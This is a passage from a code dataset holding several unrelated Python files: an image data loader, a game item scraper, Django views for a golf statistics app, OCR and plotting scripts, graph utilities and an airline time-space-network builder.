mask = np.expand_dims(mask, -1)\n normalMask = np.expand_dims(normalMask, -1)\n \n #mask = mask*normalMask\n \n # convert to 0-1\n normal = normal.astype(np.float)\n normal = (normal/255.0 - 0.5)*2\n normal = normal/(np.tile(np.linalg.norm(normal, axis=-1, keepdims=True), (1,1,3)) + 1e-6)\n \n mask = 1.0*mask/255.0\n normalMask = 1.0*normalMask/255.0\n return image, albedo, shading, normal, mask, normalMask\n\n\nclass ToTensor(object):\n \"\"\"Convert ndarrays in sample to Tensors.\"\"\"\n def __call__(self, sample):\n image, albedo, shading, normal, mask, normalMask = sample\n # swap color axis because\n # numpy image: H x W x C\n # torch image: C X H X W\n image = image.transpose((2, 0, 1))\n albedo = albedo.transpose((2, 0, 1))\n shading = shading.transpose((2, 0, 1))\n normal = normal.transpose((2, 0, 1))\n mask = mask.transpose((2, 0, 1))\n normalMask = normalMask.transpose((2, 0, 1))\n return torch.from_numpy(image), torch.from_numpy(albedo), \\\n torch.from_numpy(shading), torch.from_numpy(normal), \\\n torch.from_numpy(mask), torch.from_numpy(normalMask)\n","sub_path":"utils/loadData_CGI.py","file_name":"loadData_CGI.py","file_ext":"py","file_size_in_byte":8424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"37960126","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom scrapper.item_scrapper import ItemScrapper\n\n\nclass CeremonialItemScrapper(ItemScrapper):\n\n ###########\n # BUILDER #\n ###########\n\n def __init__(self, url, language):\n super().__init__(url, language)\n\n #########\n # SCRAP #\n #########\n\n def scrap(self):\n data = super().scrap()\n data['level'] = int(self.get_level())\n data['description'] = self.get_description()\n\n effects = self.get_effects()\n if(effects):\n data['effects'] = effects\n\n conditions = self.get_conditions()\n if(conditions):\n data['conditions'] = conditions\n\n characteristics = self.get_characteristics()\n if(characteristics):\n data['characteristics'] = characteristics\n\n craft = self.get_craft()\n if(craft):\n data['craft'] = craft\n\n return data\n","sub_path":"src/scrapper/ceremonial_item_scrapper.py","file_name":"ceremonial_item_scrapper.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"434810796","text":"# !/usr/bin/python\n# -*- coding: utf-8\n\nimport json\nimport datetime\n\nfrom django.shortcuts import render\nfrom django.http import HttpResponseRedirect, JsonResponse\nfrom django.urls import reverse\nfrom django.conf import settings\n\nfrom .models import Player, Playlog, Shotlog\nfrom .forms import PlayerForm, SelectForm, FileupForm\nfrom .jsonread import JsonDBInsert, updateexcheck\nfrom .logfilter import FilterPlaylog, RecentPlaylog\nfrom .joinlogs import join_playlogs, unbind_playlog\nfrom .infos import clubinfo\n\n\nHOLES = (\n\t\t\"hole1\", \"hole2\", \"hole3\", \n\t\t\"hole4\", \"hole5\", \"hole6\", \n\t\t\"hole7\", \"hole8\", \"hole9\", \n\t\t\"hole10\", \"hole11\", \"hole12\", \n\t\t\"hole13\", \"hole14\", \"hole15\", \n\t\t\"hole16\", \"hole17\", \"hole18\"\n\t\t)\n\n\n# Create your views here.\ndef index(request):\n\tif request.method == 'POST':\n\t\tform = PlayerForm(request.POST)\n\t\tif form.is_valid():\n\t\t\tplayer = Player.objects.filter(name__iexact=form.cleaned_data['name'])\n\t\t\tif player.count() == 0:\n\t\t\t\tnewplayer = Player(name=form.cleaned_data['name'], yard=form.cleaned_data['yard'])\n\t\t\t\tnewplayer.save()\n\t\t\t\tplayerid = newplayer.id\n\t\t\telse :\n\t\t\t\tselectedplayer = player[0]\n\t\t\t\tplayerid = selectedplayer.id\n\t\t\t\tif selectedplayer.yard != form.cleaned_data['yard']:\n\t\t\t\t\tselectedplayer.yard = form.cleaned_data['yard']\n\t\t\t\t\tselectedplayer.save()\n\n\t\t\treturn HttpResponseRedirect(reverse('golf:playerindex', args=(playerid,)))\n\telse:\n\t\tform = PlayerForm()\n\n\treturn render(request, 'golf/index.html', {'form': form}) \n\n\ndef playerindex(request, playerid):\n\tprint('playerindex')\n\n\t# playerid check\n\ttry:\n\t\tplayer = Player.objects.get(id=playerid)\n\texcept:\n\t\treturn HttpResponseRedirect(reverse('golf:index'))\n\n\t# 통계제외 DB 업데이트 \n\tif request.is_ajax():\n\t\tprint('request is ajax')\n\t\tprint(request.body)\n\t\tnewjson = json.loads(request.body.decode('utf-8'))\n\t\tupdateexcheck(newjson['context'])\n\t\t\n\tselectform = SelectForm()\n\tfileupform = FileupForm()\n\n\t# 최근 playlog, player setting 따라 갯수 변경\n\tcontext = RecentPlaylog(playerid, player.recent)\t\t\n\n\tcontext['selectform'] = selectform\n\tcontext['fileupform'] = fileupform\n\tcontext['player'] = player\n\n\treturn render(request, 'golf/playerindex.html', context) \n\n\ndef functions(request, **kwargs):\n\tplayerid = kwargs['playerid']\n\tprint('functions')\n\tprint(kwargs)\n\n\t# playerid check\n\ttry:\n\t\tplayer = Player.objects.get(id=playerid)\n\texcept:\n\t\treturn HttpResponseRedirect(reverse('golf:index'))\n\n\tif request.method == 'POST':\n\t\tif kwargs['fname'] == 'update':\n\t\t\tprint('update')\n\t\t\tfileupform = FileupForm(request.FILES)\n\t\t\toverwrite = request.POST.getlist('overwrite')\n\t\t\tif len(overwrite) != 0:\n\t\t\t\toverwrite = overwrite[0] == 'on'\n\t\t\tJsonDBInsert(request.FILES['jsonfile'], playerid, overwrite)\n\n\t\t\treturn HttpResponseRedirect(reverse('golf:playerindex', args=(playerid,)))\n\t\telif kwargs['fname'] == 'select':\n\t\t\tprint('select')\n\t\t\tif request.is_ajax():\n\t\t\t\tprint('select ajax')\n\t\t\t\tnewjson = json.loads(request.body.decode('utf-8'))\n\t\t\t\tupdateexcheck(newjson['context'])\n\n\t\t\t\tselectform = SelectForm(newjson)\n\t\t\t\tcontext = FilterPlaylog(\n\t\t\t\t\t\tplayerid, \n\t\t\t\t\t\tnewjson['startdate'], \n\t\t\t\t\t\tnewjson['enddate'], \n\t\t\t\t\t\tnewjson['course']\n\t\t\t\t\t\t)\n\t\t\t\tcontext['selectform'] = selectform\n\n\t\t\t\treturn render(request, 'golf/selectindex.html', context) \n\t\t\telse:\n\t\t\t\tselectform = SelectForm(request.POST)\n\n\t\t\t\tif selectform.is_valid():\n\t\t\t\t\tprint('select by submit')\n\t\t\t\t\tcontext = FilterPlaylog(\n\t\t\t\t\t\t\tplayerid, \n\t\t\t\t\t\t\tselectform['startdate'].value(), \n\t\t\t\t\t\t\tselectform['enddate'].value(), \n\t\t\t\t\t\t\tselectform['course'].value()\n\t\t\t\t\t\t\t)\n\t\t\t\t\tcontext['selectform'] = selectform\n\n\t\t\t\t\treturn render(request, 'golf/selectindex.html', context) \n\t\telif kwargs['fname'] == 'setting':\n\t\t\tprint('setting')\n\n\n\t\t\tcontext={\n\t\t\t\t'player': player,\n\t\t\t}\n\n\t\t\treturn render(request, 'golf/setting.html', context) \n\n\treturn HttpResponseRedirect(reverse('golf:playerindex', args=(playerid,)))\n\n\ndef logdetail(request, playerid, logid):\n\tprint('logdetail')\n\tif request.is_ajax():\n\t\tnewjson = json.loads(request.body.decode('utf-8'))\n\t\tif 'combine' in newjson:\n\t\t\t# combine\n\t\t\t# timeinfo로 선후결정\n\t\t\tlogs = Playlog.objects.filter(id__in=[logid, int(newjson['combine'])]).order_by('timeinfo')\n\t\t\tnewplaylog = join_playlogs(logs[0], logs[1])\n\t\t\t\n\t\t\treturn JsonResponse({\"combinedlog\": newplaylog.id})\n\t\telif 'unbind' in newjson:\n\t\t\t# unbind\n\t\t\tcombinedlog = Playlog.objects.get(id=int(newjson['unbind']))\n\t\t\tfirstid = unbind_playlog(combinedlog)\n\n\t\t\treturn JsonResponse({\"first\": firstid})\n\n\t# playerid check\n\ttry:\n\t\tplayer=Player.objects.get(id=playerid)\n\texcept:\n\t\treturn HttpResponseRedirect(reverse('golf:index'))\n\n\t# get google apikey from file\n\tf = open(settings.GAPIKEY,'r')\n\tgapikey = f.readline()[:-1]\t# enter 제외\n\n\t# playlog id check\n\ttry:\n\t\tlog = Playlog.objects.get(id=logid)\n\texcept:\n\t\treturn HttpResponseRedirect(reverse('golf:playerindex', args=(playerid,)))\n\n\t# combine된 구성 log인 경우 combined log로\n\tif log.hidden:\n\t\tcombinedlog = Playlog.objects.filter(combined=True, first=log)\n\t\tcombinedlog = combinedlog | Playlog.objects.filter(combined=True, second=log)\n\t\tif combinedlog.count() != 0:\n\t\t\treturn HttpResponseRedirect(reverse('golf:logdetail', args=(playerid,combinedlog[0].id)))\n\t\telse:\n\t\t\treturn HttpResponseRedirect(reverse('golf:playerindex', args=(playerid,)))\n\n\t# num_holes == 9인 경우 combine 가능한 playlog 후보군 보여주기(timeinfo 6시간 이내 인접, timeoffset 동일한 코스 로그)\n\tcombinelist = []\n\tif log.num_holes == 9:\n\t\trule = 6\t# 기준 6시간\n\t\tpostbound = log.timeinfo.datetime + datetime.timedelta(hours=rule)\n\t\tprebound = log.timeinfo.datetime - datetime.timedelta(hours=rule)\n\t\tcombinelist = Playlog.objects.filter(\n\t\t\t\tplayer=player, \n\t\t\t\tnum_holes=9, \n\t\t\t\ttimeinfo__datetime__lte=postbound, \n\t\t\t\ttimeinfo__datetime__gte=prebound, \n\t\t\t\ttimeinfo__timezoneid=log.timeinfo.timezoneid\n\t\t\t\t).exclude(id=log.id)\n\n\tpar = []\n\tlevel = []\n\tputt = []\n\tscoreset = []\n\tsand = []\n\tpenalty = []\n\tplayedhole = []\n\tgirs = []\n\tfhits = []\n\tpredic = {\n\t\t'par': 0,\n\t\t'score': 0,\n\t\t'putt': 0,\n\t\t'gir': 0,\n\t\t'fhit': 0,\n\t\t'totfhit': 9,\n\t\t'sand': 0,\n\t\t'penalty': 0,\n\t}\n\tpostdic = dict(predic)\n\ttotdic = dict(predic)\n\n\tfor idx, h in enumerate(HOLES[:log.num_holes], start=0):\n\t\tparval = getattr(log.course.par, h)\n\t\tpar.append(parval)\n\t\tlevel.append(getattr(log.course.level, h))\n\t\tscoreset.append(getattr(log.scoreset, h)-parval)\n\t\tputt.append(getattr(log.puttset, h))\n\t\tsand.append(getattr(log.sandshotset, h))\n\t\tpenalty.append(getattr(log.penaltyset, h))\n\t\tph = getattr(log, h)\n\t\tplayedhole.append(ph)\n\t\tgirs.append(ph.gir)\n\t\tfhits.append(ph.fhit)\n \n\t\tif idx < 9:\n\t\t\tpredic['par'] += par[idx]\n\t\t\tpredic['score'] += scoreset[idx]\n\t\t\tpredic['putt'] += putt[idx]\n\t\t\tpredic['sand'] += sand[idx]\n\t\t\tpredic['penalty'] += penalty[idx]\n\t\t\tpredic['gir'] += girs[idx]\n\t\t\tpredic['fhit'] += fhits[idx]\n\t\t\tif par[idx] == 3:\n\t\t\t\tpredic['totfhit'] -= 1\n\t\telse:\n\t\t\tpostdic['par'] += par[idx]\n\t\t\tpostdic['score'] += scoreset[idx]\n\t\t\tpostdic['putt'] += putt[idx]\n\t\t\tpostdic['sand'] += sand[idx]\n\t\t\tpostdic['penalty'] += penalty[idx]\n\t\t\tpostdic['gir'] += girs[idx]\n\t\t\tpostdic['fhit'] += fhits[idx]\n\t\t\tif par[idx] == 3:\n\t\t\t\tpostdic['totfhit'] -= 1\n\n\ttotdic['par'] = predic['par'] + postdic['par']\n\ttotdic['score'] = predic['score'] + postdic['score']\n\ttotdic['putt'] = predic['putt'] + postdic['putt']\n\ttotdic['sand'] = predic['sand'] + postdic['sand']\n\ttotdic['penalty'] = predic['penalty'] + postdic['penalty']\n\ttotdic['gir'] = (predic['gir'] + postdic['gir']) * 100/ 18.0 \n\ttotdic['fhit'] = (predic['fhit'] + postdic['fhit']) * 100.0 / (predic['totfhit'] + postdic['totfhit'])\n\n\tpredic['gir'] = predic['gir'] * 100.0 / 9\n\tpredic['fhit'] = predic['fhit'] * 100.0 / predic['totfhit']\n\tpostdic['gir'] = postdic['gir'] * 100.0 / 9\n\tpostdic['fhit'] = postdic['fhit'] * 100.0 / postdic['totfhit']\n\n\t# 해당 playlog의 hole별 shot query\n\tshots = []\n\tlog_timeinfo = log.timeinfo\n\tfor idx, holeidx in enumerate(HOLES[:log.num_holes], start=1):\n\t\tif log.combined and idx <= 9:\n\t\t\tlog_timeinfo = log.first.timeinfo\n\t\telif log.combined and idx > 9:\n\t\t\tlog_timeinfo = log.second.timeinfo\n\t\t\t\n\t\tshotlogs = Shotlog.objects.exclude(latitude=None).filter(\n\t\t\t\tplayer=log.player, \n\t\t\t\ttimeinfo=log_timeinfo, \n\t\t\t\tplayedhole=getattr(log, holeidx)\n\t\t\t\t)\n\t\tif shotlogs.count != 0:\n\t\t\tshots.append(shotlogs)\n\t\telse:\n\t\t\tshots.append(None)\n\n\t# Club info\n\tlog_ids = []\n\tif log.combined:\n\t\tlog_ids.append(log.first.id)\n\t\tlog_ids.append(log.second.id)\n\telse:\n\t\tlog_ids.append(log.id)\n\t\t\n\tclubs = clubinfo(player.id, Playlog.objects.filter(id__in=log_ids), False)\n\n\thole = (1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18)\n\tstart = log.timeinfo.localstart()\n\tcontext= {\n\t\t'log': log,\n\t\t'start': start.strftime('%Y-%m-%d %H:%M:%S %z'),\n\t\t'holelist': hole[:log.num_holes],\n\t\t'par': par,\n\t\t'girs': girs,\n\t\t'fhits': fhits,\n\t\t'level': level,\n\t\t'putt': putt,\n\t\t'scoreset': scoreset,\n\t\t'sand': sand,\n\t\t'penalty': penalty,\n\t\t'holes': playedhole,\n\t\t'gapikey': gapikey,\n\t\t'shots': shots,\n\t\t'combinelist': combinelist,\n\t\t'clubs': clubs,\n 'predic': predic,\n 'postdic': postdic,\n 'totdic': totdic\n\t}\n\n\treturn render(request, 'golf/detail.html', context) \n","sub_path":"golf/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"568131734","text":"'''\nThe last index is 804,414.\n'''\nimport os\n\ndata_dir = 'coarse_chopped'\n\nif not os.path.exists(data_dir):\n os.mkdir(data_dir)\n\nindex_cnt = 804414\nbatch_size = 402207\ninput_file = 'vectorized.dat'\n\nfout = None\n\nfor line in open(input_file):\n row, col, value = line.rstrip('\\n').split('\\t')\n if int(row) % batch_size == 1:\n # close previously open file if any\n if fout:\n fout.close()\n\n # create a new file\n fnum = int(row) / batch_size\n file_name = os.path.join(data_dir, 'chopped%d.dat' % fnum)\n fout = open(file_name, 'w')\n\n fout.write(line)\n\nfout.close()\n\n","sub_path":"code_doc10_f/chop_dat.py","file_name":"chop_dat.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"504732362","text":"from paddleocr import PaddleOCR\nimport argparse\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--i', dest='input_dir', type=str, required=True)\nparser.add_argument('--o', dest='output_dir', type=str, required=True)\nargs = parser.parse_args()\nocr = PaddleOCR(\n det_model_dir=\n '/home/zhaohj/Documents/checkpoint/paddOCR/inference/ch_ppocr_server_v2.0/det',\n rec_model_dir=\n '/home/zhaohj/Documents/checkpoint/paddOCR/inference/ch_ppocr_server_v2.0/rec',\n rec_char_dict_path=\n '/home/zhaohj/Documents/checkpoint/paddOCR/inference/ch_ppocr_server_v2.0/ppocr_keys_v1.txt',\n cls_model_dir=\n '/home/zhaohj/Documents/checkpoint/paddOCR/inference/ch_ppocr_server_v2.0/cls',\n use_angle_cls=True,\n max_text_length=15,\n drop_score=0.5,\n det_db_unclip_ratio=2.0,\n lang=\"ch\")\n\n\ndef predict(img):\n ocr_data = ocr.ocr(img, cls=True)\n return ocr_data\n\n\nif __name__ == '__main__':\n import glob\n import cv2\n import os\n import shutil\n\n files = glob.glob(f'{args.input_dir}/*.png')\n files.extend(glob.glob(f'{args.input_dir}/*.jpeg'))\n files.extend(glob.glob(f'{args.input_dir}/*.jpg'))\n files.extend(glob.glob(f'{args.input_dir}/*.webp'))\n if os.path.exists(args.output_dir):\n shutil.rmtree(args.output_dir)\n for file in files:\n _, filename = os.path.split(file)\n filename, _ = os.path.splitext(filename)\n output_filename = f'{args.output_dir}/{filename}.png.txt'\n os.makedirs(os.path.dirname(output_filename), exist_ok=True)\n img = cv2.imread(file)\n ocr_data = predict(img)\n with open(output_filename, 'a') as f:\n for data in ocr_data:\n box = data[0]\n txt = data[1][0]\n confidence = data[1][1]\n line = f\"{', '.join([', '.join(str(int(m)) for m in x) for x in box])},{confidence},{txt}\\n\".replace(\n ' ', '')\n f.write(line)\n del ocr_data\n","sub_path":"ocr_evaluation/transfer_paddle.py","file_name":"transfer_paddle.py","file_ext":"py","file_size_in_byte":1975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"280010636","text":"# coding: utf-8\n\nimport hashlib\nimport os.path\n\nfrom mss.tools import to_png\n\n\nWIDTH = 10\nHEIGHT = 10\nMD5SUM = '055e615b74167c9bdfea16a00539450c'\n\n\ndef test_output_file():\n data = b'rgb' * WIDTH * HEIGHT\n output = '{}x{}.png'.format(WIDTH, HEIGHT)\n to_png(data, (WIDTH, HEIGHT), output=output)\n\n assert os.path.isfile(output)\n with open(output, 'rb') as png:\n assert hashlib.md5(png.read()).hexdigest() == MD5SUM\n\n\ndef test_output_raw_bytes():\n data = b'rgb' * WIDTH * HEIGHT\n raw = to_png(data, (WIDTH, HEIGHT))\n assert hashlib.md5(raw).hexdigest() == MD5SUM\n","sub_path":"tests/test_tools.py","file_name":"test_tools.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"181352182","text":"\n# Copyright (c) 2016, Genevolv LLC. All rights reserved.\n\n''' Common string translations used in naming strategies.'''\n\nimport logging\nLOG = logging.getLogger(__name__)\n# LOG.setLevel(logging.INFO)\n\nimport re\n\ndef SQL_to_CapitalizedWords(name):\n ''' Converts name to class-version capitalized words. '''\n # LOG.debug(name)\n low = name.lower()\n expanded = list(low)\n expanded[0] = expanded[0].upper()\n idx = low.find('_')\n while idx != -1:\n idx += 1\n expanded[idx] = expanded[idx].upper()\n idx = low.find('_', idx)\n retval = \"\".join(expanded)\n retval = retval.replace('_', '')\n return retval\n\ndef SQL_to_mixedCase(name):\n ''' Converts to name to camel case. '''\n retval = SQL_to_CapitalizedWords(name)\n retval = retval[0].lower() + retval[1:]\n return retval\n\ndef trunc_from_last_underscore(name):\n ''' Returns a string equal to everything before the last underscore\n in name.\n '''\n idx = name.rfind('_')\n retval = name[:idx]\n return retval\n\ndef CapitalizedWords_to_mixedCase(name):\n ''' Converts name to class-style camel case.'''\n match = re.search('[a-z]', name)\n if match == None:\n retval = name.lower()\n else:\n start = match.start()\n if start > 1:\n retval = name[:start-1].lower() + name[start-1:]\n else:\n retval = name[0].lower() + name[1:]\n return retval\n\ndef CapitalizedWords_to_py_name(name):\n ''' Converts capitized words to python variable name.'''\n rtn = CapitalizedWords_to_mixedCase(name)\n rtn = re.sub('([A-Z]+)', r'_\\1', rtn).lower()\n # LOG.debug('rtn: ' + str(rtn))\n return rtn\n\ndef trunc_from_last_hump(name):\n ''' Returns a string equal to everything before the last capital\n letter.\n '''\n # LOG.debug('name: ' + str(name))\n mlist = re.findall('[A-Z]+', name)\n # LOG.debug('mlist: ' + str(mlist))\n if len(mlist) > 0:\n group = mlist[-1:]\n sub = group[0]\n # LOG.debug('sub: ' + str(sub))\n idx = name.rfind(sub)\n retval = name[:idx]\n else:\n raise TypeError('no humps: ' + str(name))\n # LOG.debug('retval: ' + str(retval))\n return retval\n\ndef depluralize(name):\n ''' Makes a name singluar.'''\n retval = name\n if retval[-3:] == 'ies':\n retval = retval[:-3] + 'y'\n elif retval[-1:] == 's':\n retval = retval[:-1]\n return retval\n\n","sub_path":"py/freevolv/apps/dbrev/naming/name_translations.py","file_name":"name_translations.py","file_ext":"py","file_size_in_byte":2411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"148858093","text":"# Plot the content of a csv file\nimport scipy\nimport numpy as np\nimport matplotlib.pyplot as plt\nplt.rcParams.update({'font.size': 22})\nfrom matplotlib import rcParams\nfrom matplotlib.ticker import MaxNLocator\nimport csv\nimport seaborn as sns\nimport pandas as pd\n\nrcParams.update({'figure.autolayout': True})\nrcParams['font.family'] = 'serif'\nrcParams['font.serif'] = ['Computer Modern Roman']\nrcParams['text.usetex'] = True\n\ndef plotdiameter():\n # Initialize empty arrays\n\n t1 = []\n x1 = []\n t2 = []\n x2 = []\n\n\n\n with open('python/interface_pos.csv','r') as csvfile:\n data = csv.reader(csvfile, delimiter=',')\n next(data)\n for row in data:\n t1.append(float(row[0]))\n x1.append(float(row[1]))\n\n with open('bubbleInfo.csv','r') as csvfile:\n data = csv.reader(csvfile, delimiter=',')\n for row in data:\n t2.append(float(row[0]))\n x2.append(float(row[1])/4e-11)\n\n # Plot\n plt.figure(figsize=(250 /25.4, 200 / 25.4))\n plt.plot(t1,x1, 'b--', label='Analytical solution',linewidth=3)\n plt.plot(t2,x2, 'r-', label='Simulation',linewidth=3)\n plt.xlabel('Time [s]')\n plt.ylabel('Position [m]')\n plt.ticklabel_format(axis=\"x\", style=\"sci\", scilimits=(0,0))\n plt.ticklabel_format(axis=\"y\", style=\"sci\", scilimits=(0,0))\n #plt.title('Interesting Graph\\nCheck it out')\n plt.legend(frameon=True,loc='upper left')\n #plt.show()\n plt.draw()\n # Save in pdf format\n plt.savefig('benchmark.pdf')\n\n\nplotdiameter()\nplt.show()\n","sub_path":"stefanobstacle/python/plotBenchmark.py","file_name":"plotBenchmark.py","file_ext":"py","file_size_in_byte":1545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"214892776","text":"\"\"\"\n\"\"\"\nfrom collections import defaultdict\n\n\nclass Graph:\n \n \n def __init__(self, vertices):\n self.V = vertices\n self.graph = defaultdict(list)\n \n def addEdge(self, u, v):\n self.graph[u].append(v)\n #self.graph[v].append(u)\n \n \n \n \n def find_parent(self, parent, x):\n if parent[x] == -1:\n return x\n return self.find_parent(parent, parent[x])\n \n def union(self, parent, x, y):\n \n x_set = self.find_parent(parent, x)\n y_set = self.find_parent(parent, y)\n parent[x_set] = y_set\n \n def isCyclic(self):\n \n parent = [-1]*self.V\n \n \n for u in self.graph:\n for v in self.graph[u]:\n x = self.find_parent(parent, v)\n y = self.find_parent(parent, u)\n if x != y:\n self.union(parent, v, u)\n else:\n print(parent)\n return True\n print(parent) \n return False\n \n \n def dfsUtil(self, visited, u):\n if visited[u] is True:\n return True\n \n else:\n visited[u] = True\n for v in self.graph[u]:\n if self.dfsUtil(visited, v):\n return True\n \n visited[u] = False\n\n return False\n \n def dfs(self):\n \n visited = [False]*self.V\n \n return self.dfsUtil(visited, 0)\n \n \n \n\n \nif __name__ == \"__main__\":\n g = Graph(8)\n g.addEdge(0, 1)\n g.addEdge(1, 7)\n g.addEdge(1, 2)\n g.addEdge(2, 3)\n g.addEdge(2, 5)\n g.addEdge(5, 6)\n g.addEdge(3, 4)\n #g.addEdge(4, 1)\n \n \n print(g.isCyclic())\n print(g.dfs())\n \n \n \n ","sub_path":"Chapter 9 Graphs/DetectCycle.py","file_name":"DetectCycle.py","file_ext":"py","file_size_in_byte":1821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"288495292","text":"import copy\nimport logging\nimport numpy as np\nfrom networkx import DiGraph, has_path, astar_path, NetworkXNoPath\n# Local imports\nfrom examples.cgar.classes import Expand, Flight\nfrom examples.cgar.constants import OPERATING_COSTS\n\nlog = logging.getLogger(__name__)\n\n\nclass TSN(object):\n \"\"\"\n Time-Space-Network Object with generator and updater functions.\n\n Parameters\n ----------\n flights : list,\n list of :class:`classes.Flight` objects\n \"\"\"\n\n def __init__(self, flights):\n self.flights = flights\n self.last_arr = max([f.arrival for f in flights]) # last arrival\n self.data = Expand()\n self.G = DiGraph(directed=True, n_res=8)\n # Init update params\n self.it = None\n self.k_make = None\n self.airline = None\n self.duals = None\n self.first_flight = None\n\n def _build(self):\n self._build_data()\n self._build_graph()\n return self\n\n def _build_data(self):\n airports_dep = [f.origin for f in self.flights]\n airports_arrival = [f.destination for f in self.flights]\n self.data.airports = list(set(airports_arrival + airports_dep))\n self.data.airports.sort()\n\n def _build_graph(self):\n # Construct an Activity-on-Arc network using flights as activities\n flights = self.flights\n airports = self.data.airports\n\n self.G.add_node('Source',\n pos=(-1, len(airports) + 1),\n i_d=-1,\n airport='Source')\n self.G.add_node('Sink',\n pos=(self.last_arr + 1, -2),\n i_d=-1,\n airport='Sink')\n list(map(self._init_graph, flights))\n self._add_edges()\n log.info(\"Generated TSN with {} edges {} nodes\".format(\n len(self.G.edges()), len(self.G.nodes())))\n # plot_graph(self.G)\n\n def _init_graph(self, f):\n \"\"\" Populate graph using flights from csv file\"\"\"\n label_dep = \"{}_{}\".format(f.origin, f.departure) # label\n # Arrival node label\n label_arr = \"{}_{}\".format(f.destination, f.arrival) # label\n self._init_node(f, label_dep, label_arr) # Init nodes\n self._init_edge(f, label_dep, label_arr) # Init edges\n\n def _init_node(self, f, label_dep, label_arr):\n # Add a Departure Node\n self.G.add_node(label_dep,\n pos=(f.departure, self.data.airports.index(f.origin)),\n airport=f.origin)\n # Add an Arrival Node\n self.G.add_node(label_arr,\n pos=(f.arrival,\n self.data.airports.index(f.destination)),\n airport=f.destination)\n\n def _init_edge(self, f, label_dep, label_arr):\n # Add all flight edges\n self.G.add_edge(label_dep, label_arr, data=f._full_dict(), weight=0)\n # Add edge from Source to departure and arrival nodes\n data_source = {\n 'origin': 'Source',\n 'destination': f.origin,\n 'departure': -1,\n 'arrival': f.departure,\n 'type': f._classify_flight(0, f.departure)\n }\n self.G.add_edge('Source',\n label_dep,\n data=data_source,\n weight=self._edge_weight('Source', label_dep))\n # Add edge from arrival to Sink\n data_sink = {\n 'origin': f.destination,\n 'destination': 'Sink',\n 'departure': f.arrival,\n 'arrival': self.last_arr,\n 'type': f._classify_flight(f.arrival, self.last_arr)\n }\n self.G.add_edge(label_arr,\n 'Sink',\n data=data_sink,\n weight=self._edge_weight(label_arr, 'Sink'))\n\n def _add_edges(self):\n # Add edges if not already exist with their respective data\n self._add_ground_edges()\n self._add_remaining_edges()\n\n def _add_ground_edges(self):\n nodes = sorted(\n [\n node\n for node in self.G.nodes(data=True)\n if node[0] not in [\"Source\", \"Sink\"]\n ],\n key=lambda x: x[1]['pos'][0],\n )\n\n for n in nodes:\n # first element in tuple has string 'Airport_time'\n # Second element in tuple has node data\n n_name, n_data = n[0], n[1]\n n_time = float(n_name.split('_')[1])\n ground_nodes_n = sorted(\n [\n k\n for k in nodes\n if float(k[0].split('_')[1]) > n_time\n and n_data['airport'] == k[1]['airport']\n ],\n key=lambda x: x[1]['pos'][0],\n )\n\n # ground_nodes_n.sort()\n if ground_nodes_n:\n m = ground_nodes_n[0]\n # for m in ground_nodes_n:\n path = None\n m_name, m_data = m[0], m[1]\n m_time = float(m_name.split('_')[1])\n if not self.G.has_edge(*(n_name, m_name)):\n try:\n path = astar_path(self.G, n_name, m_name)\n except NetworkXNoPath:\n self._add_edge(n_name, n_data, n_time, m_name, m_data,\n m_time)\n if path and any(\n p.split('_')[0] != n_data['airport'] for p in path\n ):\n # if edge doesn't exist, add it\n self._add_edge(n_name, n_data, n_time, m_name, m_data,\n m_time)\n\n def _add_remaining_edges(self):\n nodes = sorted(\n [\n node\n for node in self.G.nodes(data=True)\n if node[0] not in [\"Source\", \"Sink\"]\n ],\n key=lambda x: x[1]['pos'][0],\n )\n\n for n in nodes:\n # first element in tuple has string 'Airport_time'\n # Second element in tuple has node data\n n_name, n_data = n[0], n[1]\n n_time = float(n_name.split('_')[1])\n nodes_n = sorted(\n [k for k in nodes if float(k[0].split('_')[1]) > n_time],\n key=lambda x: x[1]['pos'][0],\n )\n\n # nodes_n.sort()\n for m in nodes_n:\n m_name, m_data = m[0], m[1]\n m_time = float(m_name.split('_')[1])\n if (not has_path(self.G, n_name, m_name)):\n # if path doesn't exist add edge\n f = [f for f in self.flights\n if (f.origin == n_name and f.destination == m_name and\n f.arrival - f.departure == n_time -\n m_time and f.arrival < n_time)]\n if f:\n self._add_edge(n_name, n_data, n_time, m_name, m_data,\n m_time)\n\n def _add_edge(self, n_name, n_data, n_time, m_name, m_data, m_time):\n data = {\n 'origin': n_data['airport'],\n 'destination': m_data['airport'],\n 'departure': n_time,\n 'arrival': m_time,\n 'type': Flight._classify_flight(n_time, m_time)\n }\n self.G.add_edge(n_name,\n m_name,\n data=data,\n weight=self._edge_weight(n_name, m_name,\n {'data': data}))\n\n ################\n # Updating TSN #\n ################\n def _update_TSN(self, G, it, k_type, k_make, airline, duals, first_flight,\n drop_edges):\n \"\"\"\n Updates TSN network and returns preprocessed version,\n with less edges\n \"\"\"\n edges = G.edges(data=True)\n self.it = it\n self.k_make = k_make\n self.airline = airline\n self.duals = duals\n self.first_flight = first_flight\n\n list(map(self._update_edge_attrs, edges))\n if drop_edges:\n return self._drop_edges(G, k_type)\n else:\n return G\n\n @staticmethod\n def _drop_edges(G, k_type):\n \"\"\"\n Creates a copy of the TSN graph and removes\n unnecessary (Source, *) edges.\n \"\"\"\n G = copy.deepcopy(G)\n count, edges = 0, G.edges(data=True)\n number_edges = len(edges)\n edges_to_remove = []\n for edge in edges:\n edge_data = edge[2]\n i_airport = edge[0].split('_')[0]\n j_airport = edge[1].split('_')[0]\n if (\n (\n (\n (k_type == 1 and 